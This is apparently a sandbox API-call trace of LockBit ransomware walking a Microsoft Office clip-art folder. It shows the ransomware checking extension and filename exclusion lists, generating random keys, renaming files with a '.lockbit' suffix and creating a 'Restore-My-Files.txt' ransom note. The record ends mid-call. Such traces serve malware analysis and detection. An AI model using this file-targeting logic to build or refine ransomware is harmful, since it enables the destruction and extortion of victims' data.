[0162.301] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0162.301] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0162.301] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0162.301] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0162.301] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0162.301] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0162.302] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0162.302] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0162.302] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0162.302] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0162.302] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0162.302] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0162.302] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0162.302] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0162.302] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0162.302] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0162.302] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0162.302] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0162.302] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0162.302] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0162.302] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0162.302] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0162.302] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0162.302] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0162.302] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA00932_.WMF") returned 1 [0162.302] lstrcmpiW (lpString1="ntldr", lpString2="NA00932_.WMF") returned 1 [0162.302] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA00932_.WMF") returned 1 [0162.302] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA00932_.WMF") returned -1 [0162.302] lstrcmpiW (lpString1="autorun.inf", lpString2="NA00932_.WMF") returned -1 [0162.303] lstrcmpiW (lpString1="thumbs.db", lpString2="NA00932_.WMF") returned 1 [0162.303] lstrcmpiW (lpString1="iconcache.db", lpString2="NA00932_.WMF") returned -1 [0162.303] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0162.303] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00932_.WMF") returned=".WMF" [0162.303] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0162.303] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0162.303] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0162.303] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0162.303] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0162.303] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0162.303] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0162.303] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0162.303] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0162.303] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0162.303] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0162.303] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0162.303] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0162.303] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0162.303] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0162.303] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0162.303] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0162.303] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0162.304] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0162.304] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0162.304] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0162.304] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0162.304] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0162.304] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0162.304] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0162.304] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0162.304] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0162.304] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0162.304] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00932_.WMF.lockbit") returned 72 [0162.304] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00932_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na00932_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0162.305] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0162.305] malloc (_Size=0x40068) returned 0x1ff1e60 [0162.305] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=12816) returned 1 [0162.305] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.306] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.306] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0162.306] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.306] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.307] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0162.307] ReadFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0162.311] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00932_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00932_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0162.311] malloc (_Size=0xa6) returned 0x1fa2ed8 [0162.312] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0162.313] free (_Block=0x1fa2ed8) [0162.313] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00932_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0162.313] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0162.313] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0162.313] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8abf600, ftCreationTime.dwHighDateTime=0x1bd4b31, ftLastAccessTime.dwLowDateTime=0x6a34aa30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb8abf600, ftLastWriteTime.dwHighDateTime=0x1bd4b31, nFileSizeHigh=0x0, nFileSizeLow=0x7c46, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA01064_.WMF", cAlternateFileName="")) returned 1 [0162.313] lstrcmpiW (lpString1=".", lpString2="NA01064_.WMF") returned -1 [0162.313] lstrcmpiW (lpString1="..", lpString2="NA01064_.WMF") returned -1 [0162.313] PathFindExtensionW (pszPath="NA01064_.WMF") returned=".WMF" [0162.313] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0162.313] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0162.313] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0162.314] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0162.314] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0162.314] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0162.314] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0162.314] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0162.314] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0162.314] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0162.314] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0162.314] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0162.314] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0162.314] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0162.314] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0162.314] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0162.314] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0162.314] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0162.314] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0162.314] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0162.314] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0162.314] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0162.314] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0162.314] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0162.315] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0162.315] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0162.315] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0162.315] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0162.315] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0162.315] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0162.315] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0162.315] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0162.315] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0162.315] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0162.315] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0162.315] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0162.315] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0162.315] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0162.315] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0162.315] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0162.315] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0162.315] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0162.315] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0162.315] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0162.315] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0162.316] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0162.316] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0162.316] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA01064_.WMF") returned 1 [0162.316] lstrcmpiW (lpString1="ntldr", lpString2="NA01064_.WMF") returned 1 [0162.316] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA01064_.WMF") returned 1 [0162.316] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA01064_.WMF") returned -1 [0162.316] lstrcmpiW (lpString1="autorun.inf", lpString2="NA01064_.WMF") returned -1 [0162.316] lstrcmpiW (lpString1="thumbs.db", lpString2="NA01064_.WMF") returned 1 [0162.316] lstrcmpiW (lpString1="iconcache.db", lpString2="NA01064_.WMF") returned -1 [0162.316] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0162.316] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01064_.WMF") returned=".WMF" [0162.316] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0162.316] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0162.316] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0162.316] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0162.317] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0162.317] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0162.317] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0162.317] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0162.317] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0162.317] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0162.317] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0162.317] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0162.317] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0162.317] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0162.317] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0162.317] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0162.317] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0162.317] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0162.317] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0162.317] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0162.317] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0162.317] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0162.317] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0162.317] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0162.317] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0162.317] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0162.317] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0162.317] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0162.317] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01064_.WMF.lockbit") returned 72 [0162.317] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01064_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na01064_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0162.319] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0162.319] malloc (_Size=0x40068) returned 0x3d70450 [0162.319] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=31814) returned 1 [0162.319] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.319] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.319] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0162.319] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.320] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.320] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0162.320] ReadFile (in: hFile=0x2a4, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0162.325] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01064_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01064_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0162.325] malloc (_Size=0xa6) returned 0x1fa2ed8 [0162.325] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0162.326] free (_Block=0x1fa2ed8) [0162.326] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01064_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0162.326] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0162.327] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0162.327] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x117a8f00, ftCreationTime.dwHighDateTime=0x1bd4b30, ftLastAccessTime.dwLowDateTime=0x6a34aa30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x117a8f00, ftLastWriteTime.dwHighDateTime=0x1bd4b30, nFileSizeHigh=0x0, nFileSizeLow=0x54a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA01066_.WMF", cAlternateFileName="")) returned 1 [0162.327] lstrcmpiW (lpString1=".", lpString2="NA01066_.WMF") returned -1 [0162.327] lstrcmpiW (lpString1="..", lpString2="NA01066_.WMF") returned -1 [0162.327] PathFindExtensionW (pszPath="NA01066_.WMF") returned=".WMF" [0162.327] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0162.327] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0162.327] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0162.327] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0162.327] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0162.327] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0162.327] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0162.327] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0162.327] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0162.327] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0162.327] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0162.327] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0162.327] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0162.328] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0162.328] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0162.328] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0162.328] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0162.328] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0162.328] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0162.328] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0162.328] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0162.328] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0162.328] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0162.328] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0162.328] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0162.328] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0162.328] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0162.328] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0162.328] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0162.328] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0162.328] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0162.328] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0162.328] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0162.328] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0162.329] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0162.329] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0162.329] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0162.329] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0162.329] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0162.329] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0162.329] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0162.329] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0162.329] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0162.329] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0162.329] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0162.329] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0162.329] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0162.329] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA01066_.WMF") returned 1 [0162.329] lstrcmpiW (lpString1="ntldr", lpString2="NA01066_.WMF") returned 1 [0162.329] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA01066_.WMF") returned 1 [0162.329] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA01066_.WMF") returned -1 [0162.329] lstrcmpiW (lpString1="autorun.inf", lpString2="NA01066_.WMF") returned -1 [0162.329] lstrcmpiW (lpString1="thumbs.db", lpString2="NA01066_.WMF") returned 1 [0162.329] lstrcmpiW (lpString1="iconcache.db", lpString2="NA01066_.WMF") returned -1 [0162.329] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0162.330] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01066_.WMF") returned=".WMF" [0162.330] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0162.330] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0162.330] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0162.330] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0162.330] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0162.330] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0162.330] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0162.330] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0162.330] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0162.330] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0162.330] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0162.330] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0162.330] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0162.330] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0162.330] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0162.330] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0162.330] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0162.330] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0162.331] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0162.331] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0162.331] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0162.331] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0162.331] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0162.331] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0162.331] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0162.331] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0162.331] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0162.331] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0162.331] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01066_.WMF.lockbit") returned 72 [0162.331] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01066_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na01066_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0162.336] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0162.336] malloc (_Size=0x40068) returned 0x3df0008 [0162.336] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=21672) returned 1 [0162.337] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.337] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.337] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0162.337] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.338] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.338] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0162.338] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: 